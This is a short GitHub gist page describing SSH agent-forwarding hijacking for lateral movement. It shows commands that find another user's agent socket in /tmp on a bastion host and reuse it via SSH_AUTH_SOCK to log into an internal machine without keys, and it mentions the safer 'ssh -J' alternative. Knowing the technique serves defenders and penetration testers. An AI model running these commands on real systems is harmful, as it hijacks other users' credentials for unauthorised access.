Skip to content

Instantly share code, notes, and snippets.

@Jumbo-WJB

Jumbo-WJB/SSH Agent Forwarding.md

Forked from int0x80/SSH Agent Forwarding.md
Created January 7, 2021 04:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Jumbo-WJB/7131b2ea36c40b828a46d7d502b28ccc to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Jumbo-WJB/7131b2ea36c40b828a46d7d502b28ccc to your computer and use it in GitHub Desktop.
Download ZIP
Raw
SSH Agent Forwarding.md

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment